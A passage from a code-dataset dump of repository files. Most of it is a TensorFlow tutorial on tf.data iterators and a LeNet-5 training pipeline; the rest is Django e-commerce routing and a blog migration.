train_dataset.output_shapes)\n X_batch, Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n\n train_val_iterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n train_iterator = train_val_iterator.make_initializer(train_dataset)\n val_iterator = train_val_iterator.make_initializer(val_dataset)\n\n test_iterator = test_dataset.make_one_shot_iterator()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n train_val_string_handle = sess.run(train_val_iterator.string_handle())\n test_string_handle = sess.run(test_iterator.string_handle())\n for epoch in range(epochs):\n\n # train the model\n sess.run(train_iterator, feed_dict={X_data: X_train, Y_data: y_train})\n total_train_accuracy = 0\n no_train_examples = len(y_train)\n try:\n while True:\n temp_train_accuracy, _ = sess.run([accuracy, learner], feed_dict={handle: train_val_string_handle})\n total_train_accuracy += temp_train_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n # validate the model\n sess.run(val_iterator, feed_dict={X_data: X_val, Y_data: y_val})\n total_val_accuracy = 0\n no_val_examples = len(y_val)\n try:\n while True:\n temp_val_accuracy = sess.run(accuracy, feed_dict={handle: train_val_string_handle})\n total_val_accuracy += temp_val_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Epoch {}'.format(str(epoch + 1)))\n print(\"---------------------------\")\n print('Training accuracy is {}'.format(total_train_accuracy / no_train_examples))\n print('Validation accuracy is {}'.format(total_val_accuracy / no_val_examples))\n\n print(\"Testing the model --------\")\n\n total_test_accuracy = 0\n no_test_examples = len(y_test)\n try:\n while True:\n temp_test_accuracy = sess.run(accuracy, feed_dict={handle: test_string_handle})\n total_test_accuracy += temp_test_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Testing accuracy is {}'.format(total_test_accuracy / no_test_examples))"
},
{
"alpha_fraction": 0.5787546038627625,
"alphanum_fraction": 0.6007326245307922,
"avg_line_length": 23.81818199157715,
"blob_id": "2af109c0f53a03f91dcd5ae3dd23d063bc496e90",
"content_id": "253930a943e56b15c0d572fc424a0ac2e28e615a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/add.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\nx = tf.constant([3, 4, 5], name = 'x')\ny = tf.constant([1, 2, 3], name = 'y')\n\nz = tf.add(x, y, name='z')\n\nwith tf.Session() as sess:\n with tf.summary.FileWriter('summaries', sess.graph) as writer:\n numpy_z = sess.run([z])\nprint(numpy_z)\n"
},
{
"alpha_fraction": 0.49902305006980896,
"alphanum_fraction": 0.5288198590278625,
"avg_line_length": 30.687307357788086,
"blob_id": "7b5eb3488349e50c7741423e37f69b7bad6ceb85",
"content_id": "d05837dbe816dcf37b5d56fdaf34dc60d3fbc019",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10236,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 323,
"path": "/dataset_tutorials.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "\nimport tensorflow as tf\nimport numpy as np\n\ndef Print(next_ele):\n with tf.Session() as sess:\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n\n###############################################################################\n'''Batches: Combines consecutive elements of the Dataset into a single batch.\nUseful when you want to train smaller batches of data to avoid out of memory \nerrors.'''\n###############################################################################\n\ndef Batches():\n data = np.arange(10, 40)\n\n # create batches of 10\n dataset = tf.data.Dataset.from_tensor_slices(data).batch(10)\n\n # creat the iterator to consume the data\n iterator = dataset.make_one_shot_iterator()\n next_ele = iterator.get_next()\n return next_ele\n\n'''\nThe output is :\n\n[10 11 12 13 14 15 16 17 18 19] \n[20 21 22 23 24 25 26 27 28 29] \n[30 31 32 33 34 35 36 37 38 39]\n'''\n\n\n###############################################################################\n'''Zip: Creates a Dataset by zipping together datasets. Useful in scenarios\nwhere you have features and labels and you need to provide the pair of feature\nand label for training the model.'''\n###############################################################################\n\ndef Zip():\n data_x = np.arange(10, 40)\n data_y = np.arange(11, 41)\n\n dataset_x = tf.data.Dataset.from_tensor_slices(data_x)\n dataset_y = tf.data.Dataset.from_tensor_slices(data_y)\n\n dcombined = tf.data.Dataset.zip((dataset_x, dataset_y)).batch(5)\n\n iterator = dcombined.make_one_shot_iterator()\n return iterator.get_next()\n\n'''\nThe output is\n\n(array([10, 11]), array([11, 12])) \n(array([12, 13]), array([13, 14])) \n(array([14, 15]), array([15, 16])) \n(array([16, 17]), array([17, 18])) \n(array([18, 19]), array([19, 20]))\n'''\n\n\n###############################################################################\n'''Repeat: Used to repeat the Dataset.'''\n###############################################################################\n\ndef Repeat():\n dataset = tf.data.Dataset.from_tensor_slices(tf.range(10))\n dataset = dataset.repeat(count = 2)\n iterator = dataset.make_one_shot_iterator()\n next_ele = iterator.get_next()\n return next_ele\n\n'''The Output is \n\n0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9\n'''\n\n\n###############################################################################\n'''Map: Used to transform the elements of the Dataset. Useful in cases where\nyou want to transform your raw data before feeding into the model.'''\n###############################################################################\n\ndef map_fnc(x):\n return x*2\n \n\ndef Map():\n data = np.arange(10)\n dataset = tf.data.Dataset.from_tensor_slices(data)\n dataset = dataset.map(map_fnc)\n\n iterator = dataset.make_one_shot_iterator()\n next_ele = iterator.get_next()\n return next_ele\n\n'''\nThe output is\n\n0 2 4 6 8 10 12 14 16 18\n'''\n\n###############################################################################\n############# print the output of all the function ############################\n###############################################################################\n\n#Print(Batches())\n#Print(Zip())\n#Print(Repeat())\n#Print(Map())\n\n\n\n###############################################################################\n############## Iterators #####################################################\n###############################################################################\n\ndef Print_One_Ite(next_element):\n with tf.Session() as sess:\n val = sess.run(next_element)\n print(val)\n\n\n###############################################################################\n'''One-shot iterator: This is the most basic form of iterator. It requires\nno explicit initialization and iterates over the data only one time and once\nit gets exhausted, it cannot be re-initialized.'''\n###############################################################################\n\ndef One_Shot_iterator():\n data = np.arange(10, 50)\n #create the dataset\n dataset = tf.data.Dataset.from_tensor_slices(data)\n\n #Create the iterator\n iterator = dataset.make_one_shot_iterator()\n next_element = iterator.get_next()\n return next_element\n\n# Print_One_Ite(One_Shot_iterator())\n\n\n###############################################################################\n'''Initializable iterator: This iterator requires you to explicitly initialize \nthe iterator by running iterator.initialize. You can define a tf.placeholder \nand pass data to it dynamically each time you call the initialize \noperation.'''\n###############################################################################\n\ndef Initializable_iterator(min_val = 10, max_val = 40, batch_size = 3):\n # Define two placeholders to accept min and max values\n _min_val = tf.placeholder(tf.int32, shape=[], name = 'min_val')\n _max_val = tf.placeholder(tf.int32, shape=[], name = 'max_val')\n _batch_size = tf.placeholder(tf.int64, shape=[], name = 'batch_size')\n\n data = tf.range(_min_val, _max_val)\n\n dataset = tf.data.Dataset.from_tensor_slices(data).batch(_batch_size)\n\n iterator = dataset.make_initializable_iterator()\n next_ele = iterator.get_next()\n with tf.Session() as sess:\n\n # Initialize an iterator with range of values from 10 to 16\n sess.run(\n iterator.initializer,\n feed_dict = {\n _min_val: min_val,\n _max_val: max_val,\n _batch_size: batch_size\n }\n )\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n'''\nThe output is\n\n[10 11 12]\n[13 14 15]\n[16 17 18]\n[19 20 21]\n[22 23 24]\n[25 26 27]\n[28 29 30]\n[31 32 33]\n[34 35 36]\n[37 38 39]\n'''\n\n\n###############################################################################\n'''Reinitializable iterator: This iterator can be initialized from different\nDataset objects that have the same structure. Each dataset can pass through \nits own transformation pipeline.'''\n###############################################################################\n\ndef map_fnc(ele):\n return ele*2\n\ndef Reinitializable_Iterator(\n min_val_train = 10, \n max_val_train = 18, \n min_val_validation = 1, \n max_val_validation = 10, \n batch_size = 3\n ):\n min_val_ = tf.placeholder(tf.int32, shape = [], name = 'min_val')\n max_val_ = tf.placeholder(tf.int32, shape = [], name = 'max_val')\n batch_size_ = tf.placeholder(tf.int64, shape = [], name = 'batch_size')\n\n data = tf.range(min_val_, max_val_)\n\n # Define separate datasets for training and validation\n train_dataset = tf.data.Dataset.from_tensor_slices(data).batch(batch_size_)\n val_dataset = tf.data.Dataset.from_tensor_slices(data).map(map_fnc).batch(batch_size_)\n\n # Create an iterator\n iterator = tf.data.Iterator.from_structure(\n train_dataset.output_types,\n train_dataset.output_shapes\n )\n\n train_initializer = iterator.make_initializer(train_dataset)\n val_initializer = iterator.make_initializer(val_dataset)\n\n next_ele = iterator.get_next()\n with tf.Session() as sess:\n print('Train Dataset:')\n # initialize an iterator with range of values from 10 to 16\n sess.run(train_initializer, feed_dict={\n min_val_:min_val_train,\n max_val_:max_val_train,\n batch_size_:batch_size\n })\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n\n print(\"Validation Dataset:\")\n # Initialize an iterator with range of values from 1 to 10\n sess.run(val_initializer, feed_dict={\n min_val_:min_val_validation,\n max_val_:max_val_validation,\n batch_size_:batch_size\n })\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n'''\nThe Output is:\nTrain Dataset:\n[10 11 12]\n[13 14 15]\n[16 17]\nValidation Dataset:\n[2 4 6]\n[ 8 10 12]\n[14 16 18]\n'''\n\n\n###############################################################################\n'''Feedable iterator: Can be used to switch between Iterators for different\nDatasets. Useful when you have different Datasets and you want to have more \ncontrol over which iterator to use over the Dataset.'''\n###############################################################################\n\ndef map_fnc(x):\n return x*2\n\n\ndef Feedable_Iterator():\n min_val_ = tf.placeholder(tf.int32, shape = [])\n max_val_ = tf.placeholder(tf.int32, shape = [])\n batch_size_ = tf.placeholder(tf.int64, shape = [])\n\n data = tf.range(min_val_, max_val_)\n train_dataset = tf.data.Dataset.from_tensor_slices(data).batch(batch_size_)\n val_dataset = tf.data.Dataset.from_tensor_slices(data).map(map_fnc).batch(batch_size_)\n\n train_val_iterator = tf.data.Iterator.from_structure(train_dataset.output_types , train_dataset.output_shapes)\n train_initializer = train_val_iterator.make_initializer(train_dataset)\n val_initializer = train_val_iterator.make_initializer(val_dataset)\n\n test_dataset = tf.data.Dataset.from_tensor_slices(tf.range(10, 15))\n test_iterator = test_dataset.make_one_shot_iterator()\n\n handle = tf.placeholder(tf.string, shape = [])\n iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)\n next_ele = iterator.get_next()\n\n with tf.Session() as sess:\n train_val_handle = sess.run(train_val_iterator.string_handle())\n test_handle = sess.run(test_iterator.string_handle())\n\n # training\n sess.run(train_initializer, feed_dict={min_val_:10, max_val_:18, batch_size_:3})\n try:\n while True:\n val = sess.run(next_ele, feed_dict={handle:train_val_handle})\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n\n\n\nFeedable_Iterator()\n"
},
{
"alpha_fraction": 0.6464646458625793,
"alphanum_fraction": 0.6767676472663879,
"avg_line_length": 18.799999237060547,
"blob_id": "6fcfd15395cb90b5e315fd43c6c8170219b6b550",
"content_id": "0f6386175c32983d924798dd946203955a68341e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/add_eager.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n# import tf.eager\nfrom tensorflow.contrib.eager.python import tfe\n\ntfe.enable_eager_execution()\n\nx = tf.constant([3, 4, 5])\ny = tf.constant([1, 2, 3])\n\nprint(\"X - Y: \", x-y)\n"
},
{
"alpha_fraction": 0.7286876440048218,
"alphanum_fraction": 0.7301025986671448,
"avg_line_length": 61.82222366333008,
"blob_id": "a9305fe66e72123c55f1066643a439f17ab805cc",
"content_id": "204e2c551d43ba049bb48d4b99df16357d1f18ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2831,
"license_type": "no_license",
"max_line_length": 366,
"num_lines": 45,
"path": "/LeNet-5/main.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: main.py\n\nimport tensorflow as tf\nimport numpy as np\nimport argparse\nfrom One_shot_iterator import One_Shot_iterator\nfrom Initializable_iterator import initializable_iterator\nfrom ReInitializable_iterator import ReInitializable_iterator\nfrom Feedable_iterator import Feedable_iterator\nfrom download_data import train_data, val_data, test_data\n\nparser = argparse.ArgumentParser(description='Training the LeNet-5 model with the variours data pipeline method (Iterator) in the tensorflow')\nparser.add_argument(\"-osi\", \"--one_shot_iterator\", help=\"One-shot iterator: The Dataset can’t be reinitialized once exhausted. To train for more epochs, you would need to repeat the Dataset before feeding to the iterator. This will require huge memory if the size of the data is large. It also doesn’t provide any option to validate the model.\", action='store_true')\nparser.add_argument(\"-ii\", \"--initializable_iterator\", help=\"Initializable iterator: You can dynamically change the Dataset between training and validation Datasets. However, in this case both the Datasets needs to go through the same transformation pipeline.\",\n action='store_true')\nparser.add_argument(\"-ri\", \"--reinitializable_iterator\", help=\"Re-initializable iterator: This iterator overcomes the problem of initializable iterator by using two separate Datasets. Each dataset can go through its own preprocessing pipeline. The iterator can be created using the tf.Iterator.from_structure method.\", action='store_true')\nparser.add_argument(\"-fi\", \"--feedable_iterator\", help=\"Feedable iterator: This iterator provides the option of switching between various iterators. You can create a re-initializable iterator for training and validation purposes. For inference/testing where you require one pass of the dataset, you can use the one shot iterator.\", action='store_true')\nargs = parser.parse_args()\n\ndef main():\n print(\"LeNet-5 model runs with various Iterators that TensorFlow provides\")\n\n if args.one_shot_iterator:\n X_train, Y_train = train_data()\n One_Shot_iterator(X_train, Y_train)\n elif args.initializable_iterator:\n X_train, Y_train = train_data()\n X_val, Y_val = val_data()\n initializable_iterator(X_train, Y_train, X_val, Y_val)\n elif args.reinitializable_iterator:\n X_train, Y_train = train_data()\n X_val, Y_val = val_data()\n ReInitializable_iterator(X_train, Y_train, X_val, Y_val)\n elif args.feedable_iterator:\n X_train, Y_train = train_data()\n X_val, Y_val = val_data()\n X_test, Y_test = test_data()\n Feedable_iterator(X_train, Y_train, X_val, Y_val, X_test, Y_test)\n else:\n print(\"Please give some argparse. For more try:\\n python3 main.py -h or --help\")\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6028985381126404,
"alphanum_fraction": 0.6623188257217407,
"avg_line_length": 40.818180084228516,
"blob_id": "8bd2c1e2883338e77cf19089ba7144646e300b99",
"content_id": "f6a4fe913b712260bc9e38eb7ce3dde148d342d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 33,
"path": "/LeNet-5/model.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n\nimport tensorflow as tf\n\n# Let’s define the forward propagation of the model.\ndef forward_pass(X):\n W1 = tf.get_variable(\"W1\", [5,5,1,6], initializer = tf.contrib.layers.xavier_initializer(seed=0))\n # for conv layer2\n W2 = tf.get_variable(\"W2\", [5,5,6,16], initializer = tf.contrib.layers.xavier_initializer(seed=0))\n Z1 = tf.nn.conv2d(X, W1, strides = [1,1,1,1], padding='VALID')\n A1 = tf.nn.relu(Z1)\n P1 = tf.nn.max_pool(A1, ksize = [1,2,2,1], strides = [1,2,2,1], padding='VALID')\n Z2 = tf.nn.conv2d(P1, W2, strides = [1,1,1,1], padding='VALID')\n A2= tf.nn.relu(Z2)\n P2= tf.nn.max_pool(A2, ksize = [1,2,2,1], strides=[1,2,2,1], padding='VALID')\n P2 = tf.contrib.layers.flatten(P2)\n \n Z3 = tf.contrib.layers.fully_connected(P2, 120)\n Z4 = tf.contrib.layers.fully_connected(Z3, 84)\n Z5 = tf.contrib.layers.fully_connected(Z4,10, activation_fn= None)\n return Z5\n\n\n# Let’s define the model operations\ndef model(X,Y):\n logits = forward_pass(X)\n cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=Y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.0009)\n learner = optimizer.minimize(cost)\n correct_predictions = tf.equal(tf.argmax(logits,1), tf.argmax(Y,1))\n accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))\n\n return (learner, accuracy)\n"
},
{
"alpha_fraction": 0.6614654064178467,
"alphanum_fraction": 0.6655359268188477,
"avg_line_length": 37.73684310913086,
"blob_id": "29f799571d67c48874d0be7d700828f7a480c3ee",
"content_id": "11b6378b627e6b6b67e39cb3387d7d2244816e0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1478,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 38,
"path": "/LeNet-5/One_shot_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: One-shot-iterator.py\n\nimport tensorflow as tf\nfrom model import model\n\n# One-shot-iterator\n'''The Dataset can’t be reinitialized once exhausted. \nTo train for more epochs, you would need to repeat the Dataset before feeding \nto the iterator. This will require huge memory if the size of the data is \nlarge. It also doesn’t provide any option to validate the model.'''\ndef One_Shot_iterator(X_train, Y_train):\n print(\"One Shot Iterator\")\n epochs = 10\n batch_size = 64\n iterations = len(Y_train) * epochs\n tf.reset_default_graph()\n dataset = tf.data.Dataset.from_tensor_slices((X_train, Y_train))\n # need to repeat the dataset for epoch number of times, as all the data needs\n # to be fed to the dataset at once\n dataset = dataset.repeat(epochs).batch(batch_size)\n iterator = dataset.make_one_shot_iterator()\n X_batch, Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n total_accuracy = 0\n try:\n while True:\n temp_accuracy, _ = sess.run([accuracy, learner])\n total_accuracy += temp_accuracy\n print('Training accuracy is {}'.format((total_accuracy * batch_size) / iterations))\n\n except tf.errors.OutOfRangeError:\n pass\n\n print('Avg training accuracy is {}'.format((total_accuracy * batch_size) / iterations))\n\n\n"
},
{
"alpha_fraction": 0.5915157198905945,
"alphanum_fraction": 0.6005719900131226,
"avg_line_length": 40.156864166259766,
"blob_id": "bc46c86aa9564dc44a1a703ce446035c5442a1db",
"content_id": "95813f91d88a3f85de8ca759c97f056e327c7c42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2098,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 51,
"path": "/LeNet-5/Initializable_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: initializable_iterator.py\n\nimport tensorflow as tf\nfrom model import model\n\n# Initializable iterator\n'''You can dynamically change the Dataset between training and validation \nDatasets. However, in this case both the Datasets needs to go through the \nsame transformation pipeline.'''\ndef initializable_iterator(X_train, y_train, X_val, y_val):\n epochs = 10\n batch_size = 64\n tf.reset_default_graph()\n X_data = tf.placeholder(tf.float32, [None, 32,32,1])\n Y_data = tf.placeholder(tf.float32, [None, 10])\n dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data))\n dataset = dataset.batch(batch_size)\n iterator = dataset.make_initializable_iterator()\n X_batch , Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n\n # train the model\n sess.run(iterator.initializer, feed_dict={X_data:X_train, Y_data:y_train})\n total_train_accuracy = 0\n no_train_examples = len(y_train)\n try:\n while True:\n temp_train_accuracy, _ = sess.run([accuracy, learner])\n total_train_accuracy += temp_train_accuracy*batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n # validate the model\n sess.run(iterator.initializer, feed_dict={X_data:X_val, Y_data:y_val})\n total_val_accuracy = 0\n no_val_examples = len(y_val)\n try:\n while True:\n temp_val_accuracy = sess.run(accuracy)\n total_val_accuracy += temp_val_accuracy*batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Epoch {}'.format(str(epoch+1)))\n print(\"---------------------------\")\n print('Training accuracy is {}'.format(total_train_accuracy/no_train_examples))\n print('Validation accuracy is {}'.format(total_val_accuracy/no_val_examples))"
},
{
"alpha_fraction": 0.7717908024787903,
"alphanum_fraction": 0.7733755707740784,
"avg_line_length": 38.4375,
"blob_id": "53aca8ac2f4f63f5a5f29ef7ebdbdc7a4d4bcbc8",
"content_id": "2458c4186d087be4eaa8027ed5aec0de9eab851f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 16,
"path": "/README.md",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# Tensorflow-Tutorial\nThe Porpose of creating this repository is to learn tensorflow with the help of some small programs.\n\n### Addition:\nThis program teach how to adding two matrix in the tensorflow.\n\n### Using Eager:\nIn this program we running the tensorflow program without using the session. This will running the code line by line as in the simple python code(interpreter).\n\n### GUP usage:\nIn this program, running the tenorflow program only by the GPU processing and this also check that weather the tensorflow is running on gpu or not `OR` tensorflow-gpu(GPU version) is installed or not.\n\n### tf.data.Dataset\n\n\n### LeNet-5\n"
},
{
"alpha_fraction": 0.6103000640869141,
"alphanum_fraction": 0.6180048584938049,
"avg_line_length": 41.517242431640625,
"blob_id": "b051a566f48a17dc493b0f79e298551352e8753d",
"content_id": "21816457d64dfc4897d87d6f142ae255623927d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2466,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 58,
"path": "/LeNet-5/ReInitializable_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: Re-initializable_iterator.py\n\nimport tensorflow as tf\nfrom model import model\n\n# Re-initializable iterator\n'''This iterator overcomes the problem of initializable iterator by using two \nseparate Datasets. Each dataset can go through its own preprocessing pipeline.\nThe iterator can be created using the tf.Iterator.from_structure method.'''\n\n\ndef map_fnc(X, Y):\n return X, Y\n\ndef ReInitializable_iterator(X_train, y_train, X_val, y_val):\n epochs = 10\n batch_size = 64\n tf.reset_default_graph()\n X_data = tf.placeholder(tf.float32, [None, 32, 32, 1])\n Y_data = tf.placeholder(tf.float32, [None, 10])\n train_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size).map(map_fnc)\n val_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size)\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n X_batch, Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n train_initializer = iterator.make_initializer(train_dataset)\n val_initializer = iterator.make_initializer(val_dataset)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n\n # train the model\n sess.run(train_initializer, feed_dict={X_data: X_train, Y_data: y_train})\n total_train_accuracy = 0\n no_train_examples = len(y_train)\n try:\n while True:\n temp_train_accuracy, _ = sess.run([accuracy, learner])\n total_train_accuracy += temp_train_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n # validate the model\n sess.run(val_initializer, feed_dict={X_data: X_val, Y_data: y_val})\n total_val_accuracy = 0\n no_val_examples = len(y_val)\n try:\n while True:\n temp_val_accuracy = sess.run(accuracy)\n total_val_accuracy += temp_val_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Epoch {}'.format(str(epoch + 1)))\n print(\"---------------------------\")\n print('Training accuracy is {}'.format(total_train_accuracy / no_train_examples))\n print('Validation accuracy is {}'.format(total_val_accuracy / no_val_examples))\n"
},
{
"alpha_fraction": 0.787642776966095,
"alphanum_fraction": 0.795950174331665,
"avg_line_length": 79.25,
"blob_id": "7a485d350ae9ca369917d7d30836967c03a323de",
"content_id": "f25f46be6defd041a46ce88f472c8f59c18672aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1930,
"license_type": "no_license",
"max_line_length": 290,
"num_lines": 24,
"path": "/LeNet-5/README.md",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# Tensorflow Pipline Tutorial on LeNet-5 model\nIn this tutorial we learn various data pipeline used in the train a model in the tensorflow. there are various method to create the data pipeline in tensorflow by using the `tf.data.Datasets` called iterator. We perform these iterator in the LeNet-5 model of handwritten digit recognitions.\n\n### One shot iterator:\nThe Dataset can’t be reinitialized once exhausted. To train for more epochs, you would need to repeat the Dataset before feeding to the iterator. This will require huge memory if the size of the data is large. It also doesn’t provide any option to validate the model.<br />\nTo run:\n`python3 main.py --one_shot_iterator`\n\n### Initializable iterator: \nYou can dynamically change the Dataset between training and validation Datasets. However, in this case both the Datasets needs to go through the same transformation pipeline.<br />\nTo run: `python3 main.py --initializable_iterator`\n\n### Re-initializable iterator:\nThis iterator overcomes the problem of initializable iterator by using two separate Datasets. Each dataset can go through its own preprocessing pipeline. The iterator can be created using the `tf.Iterator.from_structure` method.<br>\nTo run: `python3 main.py --reinitializable_iterator`\n\n### Feedable iterator:\nThis iterator provides the option of switching between various iterators. You can create a re-initializable iterator for training and validation purposes. For inference/testing where you require one pass of the dataset, you can use the one shot iterator.<br>\nTo run: `python3 main.py --feedable_iterator`\n\n#### Reference\n1. Blog: https://towardsdatascience.com/building-efficient-data-pipelines-using-tensorflow-8f647f03b4ce <br>\n2. Original Source Code: https://github.com/animesh-agarwal/Datasets-and-Iterators/blob/master/DataSet_and_Iterators.ipynb <br>\n3. https://www.tensorflow.org/api_docs/python/tf/data/Iterator#from_string_handle\n"
}
] | 12 |
Mahedihasan8855/E-com-using-Python-Django- | https://github.com/Mahedihasan8855/E-com-using-Python-Django- | a31325b4d603a52fecac8ea3ac4cb3ecfe5ccbbf | 592ac2a3ed8d09e0d7ebf4673f89b5da486436e7 | 35f77b5197376b23dcc074562848bdb4d27865b4 | refs/heads/master | 2023-04-13T10:02:24.021373 | 2021-04-03T11:08:41 | 2021-04-03T11:08:41 | 327,215,569 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6740506291389465,
"alphanum_fraction": 0.6740506291389465,
"avg_line_length": 44.14285659790039,
"blob_id": "a5ca8bb1c3087bf7f9f5072c71fe493d40c49e7e",
"content_id": "23cb4d5d0ef11805bbb68e27e8a408bde4b0d030",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 21,
"path": "/mahedi/shop/urls.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.index, name=\"ShopHome\"),\n path(\"about/\", views.about, name=\"AboutUs\"),\n path(\"contact/\", views.contact, name=\"ContactUs\"),\n path(\"tracker/\", views.tracker, name=\"TrackingStatus\"),\n path(\"search/\", views.search, name=\"Search\"),\n path(\"products/<int:myid>\", views.productView, name=\"ProductView\"),\n path(\"checkout/\", views.checkout, name=\"Checkout\"),\n path('logout/',views.user_logout,name='user_logout'),\n path('login/',views.user_login,name='user_login'),\n path('register/',views.user_register,name='user_register'),\n path('profile/',views.user_profile,name='user_profile'),\n path('user_update/',views.user_update,name='user_update'),\n path('user_password/',views.user_password,name='user_password'),\n path(\"handlerequest/\", views.handlerequest, name=\"HandleRequest\"),\n path(\"paytm/\", views.paytm, name=\"HandleRequest\"),\n]\n"
},
{
"alpha_fraction": 0.46617162227630615,
"alphanum_fraction": 0.5024752616882324,
"avg_line_length": 24.25,
"blob_id": "bf81886ee02a1ffd52403530b78c81e23a04d483",
"content_id": "bee70e1535d080793a0fa8198db909e85d46b6f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1212,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 48,
"path": "/mahedi/blog/migrations/0003_auto_20201216_1204.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2020-12-16 06:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_auto_20200707_2226'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='blogpost',\n old_name='head0',\n new_name='author',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='chead0',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='chead1',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='chead2',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='head1',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='head2',\n ),\n migrations.AddField(\n model_name='blogpost',\n name='blog',\n field=models.CharField(default='', max_length=9000),\n ),\n migrations.AlterField(\n model_name='blogpost',\n name='title',\n field=models.CharField(max_length=200),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5398457646369934,
"alphanum_fraction": 0.5604113340377808,
"avg_line_length": 29.710525512695312,
"blob_id": "1a08120f2fafd26f7b6544445f7c91bee2c75c74",
"content_id": "1ba4ed49cad4be47fe8eab1c5c8e9172ef04c4de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1167,
"license_type": "no_license",
